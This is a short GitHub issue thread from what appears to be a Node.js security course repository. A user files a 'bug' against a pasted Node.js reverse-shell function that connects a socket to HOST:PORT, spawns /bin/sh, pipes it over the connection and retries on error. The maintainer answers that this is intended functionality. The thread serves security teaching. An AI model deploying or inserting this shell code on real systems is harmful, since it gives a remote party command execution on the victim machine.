### ISSUE TITLE
bug

### ISSUE THREAD

**Issue by zengbiao** [ajinabraham/Node.Js-Security-Course#3]
function **c()** {
    var client = new net.Socket();
    client.connect(PORT, HOST, function() {
        var sh = spawn('/bin/sh',[]);
        client.write("Connected!\\n");
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
        sh.on('exit',function(code,signal){
          client.end("Disconnected!\\n");
        });
    });
    client.on('error', function(e) {
        setTimeout(**c**, TIMEOUT);
    });
}
c();
// setTimeout "callback" argument must be a function

**Comment by ajinabraham** [comment]
what is the bug? this is a functionality.
